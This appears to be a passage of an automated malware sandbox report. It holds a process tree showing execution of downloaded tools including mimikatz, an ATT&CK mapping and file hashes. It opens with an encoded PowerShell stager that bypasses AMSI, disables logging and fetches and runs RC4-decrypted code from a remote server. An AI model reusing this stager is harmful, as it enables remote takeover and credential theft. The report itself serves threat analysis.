wAnAEgASwBFAFkAXwBMAE8AQwBBAEwAXwBNAEEAQwBIAEkATgBFAFwAUwBvAGYAdAB3AGEAcgBlAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAUABvAHcAZQByAFMAaABlAGwAbABcAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQA9ACQAdgBBAEwAfQBFAEwAUwBFAHsAWwBTAEMAcgBpAFAAdABCAEwAbwBDAGsAXQAuACIARwBFAHQARgBpAGUAYABMAEQAIgAoACcAcwBpAGcAbgBhAHQAdQByAGUAcwAnACwAJwBOACcAKwAnAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQBUAFYAYQBMAFUARQAoACQATgBVAEwAbAAsACgATgBFAFcALQBPAGIASgBlAGMAdAAgAEMATwBsAEwARQBjAFQASQBvAE4AUwAuAEcARQBOAEUAcgBJAEMALgBIAEEAcwBoAFMAZQBUAFsAcwBUAFIASQBuAEcAXQApACkAfQAkAFIARQBmAD0AWwBSAGUAZgBdAC4AQQBzAFMARQBtAGIATABZAC4ARwBlAFQAVAB5AHAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAJwArACcAVQB0AGkAbABzACcAKQA7ACQAUgBFAEYALgBHAGUAdABGAEkAZQBMAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGACcAKwAnAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQB0AFYAQQBMAFUARQAoACQATgB1AGwAbAAsACQAVAByAFUAZQApADsAfQA7AFsAUwB5AHMAVABFAE0ALgBOAGUAdAAuAFMARQBSAHYAaQBDAGUAUABPAGkATgBUAE0AQQBuAGEARwBlAFIAXQA6ADoARQBYAHAARQBDAFQAMQAwADAAQwBPAG4AVABpAG4AdQBFAD0AMAA7ACQANwBiADQANQA9AFsAUwBZAHMAdABlAG0ALgBUAEUAWAB0AC4ARQBOAGMATwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcARQBUAEIAeQBUAGUAUwAoACcAagBdADYAVgAuAHkAegAqACEAaQBsACYAUgBEADcAQgAvAGMAMAAzAGgAdwBBAHIAZAAtAEYAbwB1AFUANQBnACcAKQA7ACQAUgA9AHsAJABEACwAJAA3AEIANAA1AD0AJABBAFIARwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJAA3AEIANAA1AFsAJABfACUAJAA3AGIANAA1AC4AQwBvAHUATgBUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAWABPAHIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAaQBlAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBPAE0AIABJAG4AdABlAHIAbgBlAHQARQB4AHAAbABvAHIAZQByAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuADsAJABpAGUALgBTAGkAbABlAG4AdAA9ACQAVAByAHUAZQA7ACQAaQBlAC4AdgBpAHMAaQBiAGwAZQA9ACQARgBhAGwAcwBlADsAJABmAGwAPQAxADQAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8ARABpAE4AZwBdADoAOgBVAG4ASQBDAE8AZABlAC4ARwBFAHQAUwBUAHIAaQBuAEcAKABbAEMATwBOAFYARQByAHQAXQA6ADoARgBSAG8AbQBCAGEAcwBFADYANABTAFQAUgBpAE4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABrAEEATABnAEEAeABBAEQAawBBAE4AdwBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAeABBAEQAWQBBAE8AZwBBADMAQQBEAGcAQQBNAFEAQQB3AEEAQQA9AD0AJwApACkAKQA7ACQAdAA9ACcALwBhAGQAbQBpAG4ALwBnAGUAdAAuAHAAaABwACcAOwAkAGMAPQAiAEMARgAtAFIAQQBZADoAIABiACcARgBQADkANwBkAFcAegBJAGIAOQBHAGMATQBEADEAQgBRAGYAcwBsAHgAaQA1AGsAVQBQAGcAPQAnACIAOwAkAGkAZQAuAG4AYQB2AGkAZwBhAHQAZQAyACgAJABzAGUAcgArACQAdAAsACQAZgBsACwAMAAsACQATgB1AGwAbAAsACQAYwApADsAdwBoAGkAbABlACgAJABpAGUALgBiAHUAcwB5ACkAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAE0AaQBsAGwAaQBzAGUAYwBvAG4AZABzACAAMQAwADAAfQA7ACQAaAB0ACAAPQAgACQAaQBlAC4AZABvAGMAdQBtAGUAbgB0AC4ARwBlAHQAVAB5AHAAZQAoACkALgBJAG4AdgBvAGsAZQBNAGUAbQBiAGUAcgAoACcAYgBvAGQAeQAnACwAIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEIAaQBuAGQAaQBuAGcARgBsAGEAZwBzAF0AOgA6AEcAZQB0AFAAcgBvAHAAZQByAHQAeQAsACAAJABOAHUAbABsACwAIAAkAGkAZQAuAGQAbwBjAHUAbQBlAG4AdAAsACAAJABOAHUAbABsACkALgBJAG4AbgBlAHIASAB0AG0AbAA7AHQAcgB5ACAAewAkAGQAYQB0AGEAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABoAHQAKQB9ACAAYwBhAHQAYwBoACAAewAkAE4AdQBsAGwAfQAkAEkAVgA9ACQAZABhAFQAQQBbADAALgAuADMAXQA7ACQARABhAFQAQQA9ACQARABBAFQAYQBbADQALgAuACQARABhAFQAQQAuAEwARQBuAGcAVABoAF0AOwAtAEoAbwBpAG4AWwBDAEgAQQByAFsAXQBdACgAJgAgACQAUgAgACQAZABhAHQAQQAgACgAJABJAFYAKwAkADcAYgA0ADUAKQApACAAfAAgAEkARQBYAA==
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2128
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3952 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:2504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1404 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:2832
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3924 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:2324
- C:\Users\Admin\Downloads\Debug.exe
  "C:\Users\Admin\Downloads\Debug.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1584
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --mojo-platform-channel-handle=3976 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:1
  2⤵
  PID:308
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2788 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:2616
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3036 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:1572
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3992 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:948
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4016 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:2636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3916 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:1812
- C:\Users\Admin\Downloads\Bugs.exe
  "C:\Users\Admin\Downloads\Bugs.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2188
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --mojo-platform-channel-handle=3852 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:1
  2⤵
  PID:2964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3152 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:996
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3824 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:2616
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:888
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3940 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  - Loads dropped DLL
  PID:288
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4084 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  - Loads dropped DLL
  PID:2896
- C:\Users\Admin\Downloads\mimikatz.exe
  "C:\Users\Admin\Downloads\mimikatz.exe"
  2⤵
  - Executes dropped EXE
  PID:2212
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --mojo-platform-channel-handle=3788 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:1
  2⤵
  PID:1524
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3880 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:2412
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3928 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:800
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1624 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:1724
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4116 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:2616
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4120 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:2280
- C:\Users\Admin\Downloads\Rar.exe
  "C:\Users\Admin\Downloads\Rar.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --mojo-platform-channel-handle=4012 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:1
  2⤵
  PID:1380
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3008 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:2964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3980 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:924
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4104 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:1340
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3108 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:1640
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4008 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:1572
- C:\Users\Admin\Downloads\retest.exe
  "C:\Users\Admin\Downloads\retest.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3068
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --mojo-platform-channel-handle=4108 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:1
  2⤵
  PID:2800
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2016 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:2128
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3904 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:524
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4140 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:2072
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3932 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:2608
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3520 --field-trial-handle=1212,i,10184689300514448576,16700327185963354866,131072 /prefetch:8
  2⤵
  PID:2896
- C:\Users\Admin\Downloads\cistest.exe
  "C:\Users\Admin\Downloads\cistest.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3032

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1568

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "16732959276948341091793154356-60612378995204581312994216731433128471-2115691944"
1⤵
PID:2140

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:2232

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:3032

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2404
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2404 CREDAT:275457 /prefetch:2
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:2708

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:2636

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:2964

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:996

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:924

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
5502f008aa003fd3deef235204ba32b2

SHA1
b7b330a98fbadc95c693481a99323196d98d8fce

SHA256
9f237c84e19b3e4d2dde3763f14eaf5a081871e7aa16c09cfb9ebe2364ce029f

SHA512
5f9ac2065923ffb4927012a7e1a60ab9feb5d77acc434b6cc2edc9c1ce5845bcd6c38e87f29b9555ab42520c423b47a840f5df92ea856f87b3434f2830879ce6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
0194bd017115fcdfbdcd848dfaea2282

SHA1
3a5bd3fde4837731a9c5484d62f9b38330c0c76f

SHA256
fa84f2c2042635d9e05aa0cb1a8782652009b553fb49f36b0fc4293b175ff53d

SHA512
ea5881fa18f285aaf243f194429778e7af78701b4f80c408a7dfdcf318f1978c6f206e1255eb694d5f67824cb6d827c881c154aabef080e1c8fee26065cb55cb

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
e3b0fcb1c17f2e79321c55d293126e86

SHA1
6c4248d39748fceaefc99aac36be14017df99b1b

SHA256
90eb26407b8599edeb717a7de8d4aa4289ec403f810011d8ad962617ce1ff409

SHA512
00f16a92d150147e93e17b8a715f4cf9a238dfb836eebe201af8d02e58b365d5fb94eb17909e45a161209429833b065e9f33750102ea10352ab895a0e836b9da

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
fa102a6e28a4a5f9c45c1250e03fb756

SHA1
13a46ddafd8d805718f8d90517bbedebcb4257c3

SHA256
37b13df8df20275e85237541427c378ee9d84d09d93b2bb2ca169dfe58b74888

SHA512
8b2dcd0ba95ac696dd89d0fa4dfac0739e6bbcaf803160eab961a860ad630b34d7050dced14da0777241e0d68a0ce8cefe619e2a0fcb49f7e634f460ed388b1a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
11efd4094c6b29b7aa7dff61a0ca8cdc

SHA1
b287fb25b4129413d1d654b1454685f9a53f44f3

SHA256
c72f0153762bd3fe17ac0831130b8d8e57e0eff7aaf7d926cd9457166df3f84b

SHA512
dc49e24c204f98da42343f7733d6aa07ab8134d75106d135bba77ddb9a4b75887f3b022f2e6db9bb16b51857c7d28678d3ad9d98829d24096ef3c6f69c511695

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
d72783962279e5549f7eaa905b0f0223

SHA1
3ea7b8549b8d95b9e953d1e70f89c455fee43eac

SHA256
e52fb652ccfbab65e901d4a9121d7f8fc5ce8c504d811fd80c49a75ff4de19df

SHA512
053f7b78a75f4064ab7175d329d2d0be26e6551fd2023d5a4f506a861ecbc1eca626d7487603b08c3a9b505d3364a23639b48c37a7d2dd8bcb1d76f1bc7a53f6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
62082ea80ff6d0bab4d4430be0ff62aa

SHA1
18e9729209ea5e674cf07012851f91f0f2a9ce2c

SHA256
80baf8ba154125cf6c3d0232a5e85ba2e92b71de14773d8f3a526b576ace753b

SHA512
cb9532477d372f235198453c486237c891f40787c48665dcfedd02af09a3408af0e2b1a3130c51ed31e9bb34809a7aec9c465d13318e04c7c610d400ddaf7c56

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
5810f8a31e48c46ebe03232024c639f4

SHA1
41e4d1949e947812ae979ea32bf3ccfa860cf887

SHA256
edd589fbba4e0c75267b9fd033ef0c0a49bfcf5214b003d496d0d9ba7fb53eca

SHA512
4be5b9f3b5fc2f6fedc40a1a9c46e17ca55deac2fe85a3f999888d466c309448564df83911fe55aba03e61ed2e409d8e84d101f932f5179aed0b58ca0f8cc7b5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
8ee03c9870912d6a1cb284e771e16034

SHA1
dde4f9656d929475eb6152ec56c63a1a3095ada9

SHA256
23d0bd5bf9299adcba61615897d379ae5b2764f491a54e254b24a9560bb4d4a3

SHA512
e3dcd89ca41e49f1aff97504ca6f74bcc44159d98d4cf53716ea098c8fe6996322a68ee3ce68381095ea6627cba2160ec6c5ccc5816f7648e4d7962f0b0534e6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
c51dbc5881c3d8eaab36e16a442da334

SHA1
b1cce0d2d34d8c89c79925d1b214738de126fada

SHA256
b6317f49916863426b523cb8fa8fa9400e347000c6fb0f228b62d15d0fecff1d

SHA512
649fe269a46d4ad942e8295f4b15af360f0161d5a896304cb389cf2fc0f6b1577b69333a0a3d73303771e17433db242da2da16da1df0faa9883b77e4a42ea422

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
6faa66c31312fb221898fe646afee1f6

SHA1
7e4b65fbd05e8900b642042937cd15b0a177f2d3

SHA256
ad3080964e2b380e967f8e0b98f7a087587a7645b5824edff0101865d21f79c5

SHA512
4a7c4db1bddf04ac4e7ee5109000cd4f0903340d05252bfe6d7208b994965e4858eebb7a853e0d3d86420b2c1ce519e149827366720cc703c06c7cb20f94b012

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
83d4f6b1780448888bb941ffd700c490

SHA1
64aa7a62ea4a382c795fa1373af6d2188c05fa40

SHA256
f85c547e13ec012293d0fcb9d27bdb3c666164ff91d73d1cdc08799acb3620ed

SHA512
bd1a14952765f0588485509f28d7c412ba20a60e2e5be82b71a4af091894ef39a5cc59da2f6495128e7fecaa75dd8053484fa757f55d56898a87e204b9a171f5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
2ae2183d62069ace8d9d470aaa195573

SHA1
04d2142d520c96287103ada0051c4de8a4e51d38

SHA256
512d9f5c00fc05999745fdab9809c00854cf83a11046f126fbf7b54607b0a760

SHA512
bfc574e9fd15bbe6c152acba7a4ab00fc960868a40ed9255210d12f96a152150fdce0859fd347207dce0527b56bc98de30fe301bb6f9989f909543b21353af5a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
f17c6d0de0d0a54af92df855db139954

SHA1
9ff8b9801b1dad766d09ea2ef9943e75945d7955

SHA256
9347ad42bfd8b4e50fe54fb926caef72c3c6e51d569598ad9506b47c9d334bc5

SHA512
f621c78008dbf18a6a6f11a6995e5623df34147abcc602b851bf7a9c2a5659d3ed775f76da07456ecc8f249d2381c71563bd77164ede834c029a358d2136a70c

Download Submit
